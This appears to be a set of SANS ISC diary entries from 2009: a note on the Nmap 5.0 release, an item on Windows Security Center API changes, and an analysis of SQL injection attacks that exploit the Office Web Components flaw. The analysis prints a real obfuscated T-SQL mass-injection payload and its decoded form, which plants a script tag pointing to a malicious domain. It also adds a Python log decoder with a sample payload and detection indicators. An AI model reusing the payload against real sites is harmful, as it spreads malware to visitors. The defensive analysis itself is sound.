Nmap 5.0 released

Published: 2009-07-16
Last Updated: 2009-07-16 17:51:07 UTC
by Bojan Zdrnja (Version: 1)
1 comment(s)

One of the must-have tools for every person doing anything related to IT security is definitely Nmap (I mean, which other tool, besides an SSH exploit, did Trinity use as well? And that wasn't a fake SSH exploit like the one released a couple of days ago). The Nmap developers worked hard on this latest version, which includes some very cool things like the Nmap Scripting Engine (NSE), which we even used to detect machines infected with the Conficker worm.

There are a lot of other neat new features and improvements, so don't wait and go to http://nmap.org/5/ to download your copy of Nmap.

--
Bojan

Keywords: nmap

Changes in Windows Security Center

Published: 2009-07-16
Last Updated: 2009-07-16 11:10:42 UTC
by Guy Bruneau (Version: 1)
1 comment(s)

An ISC reader wrote in about a change that occurred this month with the Windows Security Center (WSC): Microsoft expired the grace period that vendors used to report AV, firewall or anti-spyware status to the WSC. The grace period for switching to the new WSC API was supposed to last until September 2009. The new API is the result of an interface change introduced in Windows Vista SP1 and also part of Windows 7, replacing the API that was part of Vista's original release.

If you are seeing a red shield in the bottom right corner, your Malware Protection tab may be indicating that your AV "is on but it is reporting its status to Windows Security Center in a format that is no longer supported. Use the program's automatic updating feature, or contact the program manufacturer for an updated version".

The grace period to update to the new API, so that the correct status is reported to the WSC in Vista SP1, expired earlier than anticipated, causing confusion about whether your vendor's security software is protecting your PC.

This does not mean your AV, firewall or anti-spyware is not working and protecting your system, only that it is no longer able to correctly report its status through the WSC. Monitor the WSC status regularly to ensure your AV, firewall and anti-spyware are updated on schedule and functioning properly.

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot org

Teaching Comprehensive Packet Analysis in Ottawa, ON this coming September


OWC exploits used in SQL injection attacks

Published: 2009-07-16
Last Updated: 2009-07-16 08:38:21 UTC
by Bojan Zdrnja (Version: 1)
0 comment(s)

As we thought, it was just a matter of time before more attackers started exploiting the still unpatched Office Web Components vulnerability.

While a day ago reports of exploits for this vulnerability were still a bit rare, yesterday Ken Hoover sent us a log of an SQL injection attempt against his web site. The SQL injection attempt looks very much like the ones we've been seeing for months: the attacker blindly tries to inject obfuscated SQL code:

';DECLARE @S NVARCHAR(4000);
SET @S=CAST(0x44004500430…F007200 AS NVARCHAR(4000));
EXEC(@S);

After deobfuscation of the CAST function input, the following SQL code is revealed:

DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
  select a.name,b.name from sysobjects a,syscolumns b
  where a.id=b.id and a.xtype='u'
    and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
  exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=hxxp://f1y.in/j.js></script>''')
  FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

As you can see, they are injecting script code pointing to f1y.in, which is a known bad domain. This script contains links to two other web sites (www.jatrja.com and js.tongji.linezing.com) serving malicious JavaScript that, besides exploits for some older vulnerabilities, also includes the exploit for the OWC vulnerability.

The exploits end up downloading a Trojan (of course, what else), which currently has pretty bad detection (VT link): only 15 AV programs detect it, though luckily some major AV vendors are among them.

If you haven't set those killbits yet, be sure that you do so now, because the number of sites exploiting this vulnerability will probably rise exponentially soon.
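As an added example (not from the diary), here is a small Python helper for the log-review side of this: it decodes the CAST(0x... AS NVARCHAR) obfuscation in a web server log line and flags the indicators of the mass-injection payload shown above. The log line, the hex payload and the domain malicious.example are constructed for the example.

```python
import re
import urllib.parse

# Constructed sample (not from the diary): the T-SQL structure described above with a
# placeholder domain, hex-encoded the way the attacker hides it inside CAST(0x...).
SAMPLE_SQL = (
    "DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,"
    "syscolumns b where a.id=b.id and a.xtype='u' OPEN Table_Cursor "
    "exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+"
    "''<script src=hxxp://malicious.example/j.js></script>''')"
)
HEX_PAYLOAD = SAMPLE_SQL.encode("utf-16-le").hex()
SAMPLE_LOG = (
    '10.0.0.5 - - [15/Jul/2009:22:41:03 +0000] "GET /page.asp?id=1%27;DECLARE'
    "%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x" + HEX_PAYLOAD +
    '%20AS%20NVARCHAR(4000));EXEC(@S); HTTP/1.1" 200 512'
)

# Hex literal cast to (N)VARCHAR; group 2 tells us how the bytes are encoded.
CAST_RE = re.compile(r"CAST\(0x([0-9A-Fa-f]+)\s+AS\s+(N?)VARCHAR", re.IGNORECASE)
# Strings that appear in the mass-injection payload shown in the diary.
INDICATORS = ("sysobjects", "syscolumns", "Table_Cursor", "update [", "<script")


def decode_cast_payloads(line):
    """Return the plaintext of every CAST(0x...) literal found in a log line."""
    decoded = urllib.parse.unquote(line)
    payloads = []
    for hexstr, is_unicode in CAST_RE.findall(decoded):
        if len(hexstr) % 2:
            continue  # truncated literal (e.g. log line cut at a length limit)
        raw = bytes.fromhex(hexstr)
        # NVARCHAR literals are UTF-16LE; VARCHAR literals are single-byte.
        codec = "utf-16-le" if is_unicode.upper() == "N" else "latin-1"
        payloads.append(raw.decode(codec, errors="replace"))
    return payloads


def analyze_log_line(line):
    """Decode hidden SQL in a line and report which injection indicators it contains."""
    findings = []
    for sql in decode_cast_payloads(line):
        lowered = sql.lower()
        findings.append({
            "sql": sql,
            "indicators": [i for i in INDICATORS if i.lower() in lowered],
            "script_urls": re.findall(r"<script\s+src=([^>\s]+)", sql, re.IGNORECASE),
        })
    return findings
```

Run `analyze_log_line` over each request line of an IIS or Apache access log; any hit with a `<script` indicator gives you the injected domain to block and the table columns to inspect.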

--
Bojan
